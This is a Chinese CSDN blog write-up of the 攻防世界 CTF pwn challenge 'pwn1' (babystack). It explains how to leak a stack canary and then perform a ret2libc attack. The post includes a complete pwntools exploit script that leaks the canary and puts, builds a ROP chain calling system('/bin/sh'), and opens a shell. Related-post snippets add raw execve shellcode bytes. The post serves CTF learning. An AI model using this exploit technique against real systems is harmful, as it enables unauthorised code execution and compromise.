[攻防世界 pwn]——pwn1(内涵peak小知识)

最新推荐文章于 2024-04-04 21:12:24 发布
最新推荐文章于 2024-04-04 21:12:24 发布
阅读量604 收藏 5
点赞数
分类专栏: # 攻防世界
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y_peak/article/details/114234059
版权

[攻防世界 pwn]——pwn1

peak小知识

这道题目的关键就是泄露canary,通常我们泄露canary有两种方法,遇见printf函数,并且有格式化字符串漏洞的我们可以直接计算偏移利用%{offest}$s,打印出来。当然也可以用 % {offest} $p直接打印出canary 的值。
遇见可以利用的栈溢出gets函数,如果有puts函数,或者printf("%s", **)的我们也可以直接泄露出来它。首先我们要清楚canary的位置,在ebp + 8的位置。并且第一个字符为’\x00’,目的就是为了截断防止泄露出来canary,我们可以将其’\x00’覆盖为一个非零的值。这样就可以打印出canary了。该题利用的就是这一思路。

解题

还是先checksec 一下,开启了full relro意味着got表无法修改
在这里插入图片描述
在IDA中,查看一下
在这里插入图片描述
将里面的字符打印出来而已,区别是前三句有回车,第四句没有
在这里插入图片描述
将读取的字符转为数字
在这里插入图片描述

思路

利用输入1,写入可以泄露出canary的字符串。
利用输入2,泄露canary
再次利用输入1, 写入我们想要执行的rop链
利用输入3, 退出程序,同时执行rop链
接着按照我们的思路就可以了
就变成了ret2libc问题
leek出一个地址,找libc算偏移。找system, ‘/bin/sh’。执行

exploit

from pwn import *
from LibcSearcher import *
p = remote('111.200.241.244',35224)
elf = ELF("./babystack")
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main_addr = 0x0000000000400908
pop_rdi = 0x0000000000400a93

p.sendlineafter('>> ','1')
payload = 'a' * (0x90 - 8) 
p.sendline(payload)  # 等价于p.send('a' * 0x88 + '\n')
p.sendlineafter('>> ','2')
p.recvuntil('aaaa\n')
canary = u64(p.recv(7).rjust(8,'\x00'))
payload1 = 'a' * (0x90 - 8) + p64(canary) + 'a' * 8 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
p.sendlineafter('>> ','1')
p.send(payload1)
p.sendlineafter('>> ','3')
puts_addr = u64(p.recv(6).ljust(8,'\x00'))
log.success("puts_addr +: " + hex(puts_addr)
)
libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr - libc.dump('puts')
system = libc_base + libc.dump('system')
binsh = libc_base + libc.dump('str_bin_sh')
p.sendlineafter('>> ','1')
payload2 = 'a' * (0x90 - 8) + p64(canary) + 'a' * 8 + p64(pop_rdi) + p64(binsh) + p64(system)
p.send(payload2)
p.sendlineafter('>> ','3')
p.interactive()
Y-peak
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界 Mary_Morton
10-07 289
1.题目 2.IDA分析 3.流程分析
攻防世界——pwn(1)
weixin_44319142的博客
04-08 2855
get_shell
攻防世界--pwn1
qq_73149934的博客
02-22 491
canary,ret2libc 注意:只能打通远端,且libc中的systembinsh没用,用onegadget打通,在用onegadget时,注意rax需要为0,通过汇编看出选择3.exit退出时rax清0,可以onegadget Exp she_i386_20=b"\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80" she_amd64_30=b"\x48\x31\xd2\x48\xbb
攻防世界pwn——pwn1
qq_62076255的博客
12-21 438
做题记录
攻防世界 -pwn1
TedLau的博客
04-22 905
0x00 前言 首次做到跟canary绕过有关的知识,就准备写点东西记录下。 64位,保护几乎全开了。不慌,慌也没用。 0x10 分析 运行可以发现几个功能,就是说:1选项是保存你将要输入的内容,2就是打印你之前输入的内容,3就是退出。 0x11 ida分析 main函数 在main函数中发现了canary, canary的值在程序每一次运行都是会改...
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
攻防世界pwn题:Recho.doc
07-13
攻防世界pwn题:Recho.doc 知识点总结 本文总结了攻防世界pwn题:Recho.doc的知识点,涵盖了二进制文件分析、栈溢出、ROP技术、libc泄露、系统调用等多个方面。 1. 二进制文件分析 攻防世界pwn题:Recho.doc是一...
攻防世界pwn题:forgot.doc
07-13
本文档是关于攻击防御世界pwn题的Forgot.doc,涉及到有限状态自动机、正则表达式、电子邮件地址验证、Lua、IDA静态分析、canary和PIE保护机制、scanf函数溢出漏洞、栈溢出攻击、return-to-libc攻击、get_flag函数、...
Linux pwn入门教程(1)——栈溢出基础-0x01.rar
06-10
Linux pwn入门教程(1)——栈溢出基础
pwn学习资料整理——ROP技术(pwn_rop2)
08-30
pwn学习资料整理——ROP技术(pwn_rop2)
pwn--攻防世界 pwn1
最新发布
A13837377363的博客
04-04 467
canary一般是以'\x00'结尾,但是由于小端序存储,我们会先遇到'\x00',这里使用sendline自动添加的'\n'掩盖'\x00'。思路形成:先读出canary,再读出main函数的返回地址,计算出libc的基址,因为只能填入一个地址,所以就想到one_gadget。观察保护和源码,有canary保护,并且只能溢出8字节,也就是一个地址。我使用的是python3,可能由于python版本问题,我运行的时候要将。然后是读取main函数的返回地址,与这个类似,就不赘述。一个非常便捷的工具。
攻防世界pwn难度1
weixin_63282980的博客
11-05 1631
攻防世界难度1的题目WP
ACCESS加密方法
Hank's Techblog
10-21 1832
Microsoft的ACCESS数据库,是我们常用的桌面数据之一,大多中小企业的数据库管理系统都可以采用它,但其安全性一直令人担犹,试想,一套财务管理系统,用户直接打开数据库去更改数据,后果会如何?有些系统对ACCESS数据库可能只是更改扩展名,或加个密码,众所周知,破解ACCESS密码的方法和工具网上多的是!所以这样的加密一样令人担犹,下面介绍一个简单的方法,实现ACCESS数据
攻防世界babystack(pwn1)——glibc_all_in_one初体验
weixin_48066554的博客
05-14 1367
攻防世界babystack(pwn1)——glibc_all_in_one初体验 文章目录攻防世界babystack(pwn1)——glibc_all_in_one初体验引入初步分析1、checksec2、伪代码分析3、栈分析解题思路1、泄露canary3、get shellexp本地libc运行尝试尝试1尝试2尝试3尝试4(重大进展) 引入 ​ 好久没做pwn题了,找了道简单的ret2libc做做,顺便尝试解决一些历史遗留问题 (其实就是让pwn题使用本地的libc的问题,省流:有突破性进展但没有完全解决
pwn入门小技巧
qq_36918532的博客
05-24 2685
目前我所遇到的一些pwn的做题技巧 我也是偶尔玩玩ctf,所以也不会很难的,所以这篇主要是帮助刚开始学习的人学习吧 首先知识点包括:栈,堆,整数溢出,格式化字符串 目前ctf的题越来越偏向于实际,有的会使用刚刚爆出来的CVE漏洞的,所以不能只局限于glibc 所以可以大体分为两类把:libc,kernel 栈利用:有ret2libc,ret2shellcode,ret2text,ropchain,ret2syscall,brop,srop等等,当然有时候还会有seccomp的只能使用ORW系统调用 堆利用:
日行一pwnpwn1_sctf_2016
m0_57221101的博客
05-13 570
用俩图床,有的有水印,有的没水印,折磨 距离上一次日行一pwn已经快一个月了,干脆改成月行一pwn吧(汗。这段时间去恶补了王爽老师的汇编语言。 结果一回来就做了这么一道题,函数封装的严严实实,打眼一看全是C++。想入门pwn这么难吗。 正片 BUUCTF在线评测 使用BUUCTF靶场,首先标准步骤下载--放到kali里面查--拖到windows用ida反汇编 发现只有一个NX保护 NX保护就是CPU不会执行放在内存段中的代码,也就是我们之前在BOF中学习的像内存中写入Shell的方法
pwn(1)-栈溢出(上)
qq_73667990的博客
06-08 770
0x7fffffffcb18和0x7ffffffffcb28中,再后面就是函数返回地址了。gets函数可以无限写入,把前面注满,就到了存储返回地址的地址,就可以改变返回地址。gdb调试到push操作esp会减少4,ebp不变,只改变栈顶。后面的3131就是输入1的填充结果,如果我们把这个地址填充成。栈的高地址在下低地址在上,先进入的数据压入栈底。要想修改返回地址,就要知道要溢出多少个字节。可以看到,他会提示你该返回地址不存在。我们把它输入到程序,可以看到地址被修改。运行到ret后,返回会main函数,
新手打pwn
m0_74736832的博客
07-05 980
攻击者可以使用格式化字符串的特性,将一个特定的值写入到可以修改canary的位置上,从而绕过检测。它是C语言中的标准函数库,提供了各种基础函数和数据类型的定义,以及多个常用功能的实现。弹出时的数据顺序:由于栈的"先进后出"原则,"pop"指令弹出的数据顺序与它们被"push"到栈中的顺序相反。当使用"pop"指令弹出数据时,栈指针会自动向下移动,指向新的栈顶位置。x86架构(如Intel和AMD处理器)中的"pop"指令:在x86汇编语言中,"pop"指令用于将栈顶的数据弹出并存储到目标操作数中。
pwn入门:详解gdb调试程序的常见命令
Bossfrank的博客
11-03 2477
本文主要以对一个程序的调试过程为例,介绍gdb调试器的常见命令,并直观的展示所谓“溢出”覆盖的效果以及大小端序的问题。涉及的知识点包括:pwn题目环境的部署、gdb调试的常见命令、大小端序的影响、简单解pwn题目脚本的编写。
攻防世界 pwn repeater
09-13
攻防世界是一个CTF竞赛平台,其中包含了各种类型的题目,包括pwn和repeater题目。根据引用中提到的信息,攻防世界标记的难度可能不准确。这可能是因为题目的实际难度与标记的难度不一致,导致出现了这种情况。 至于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值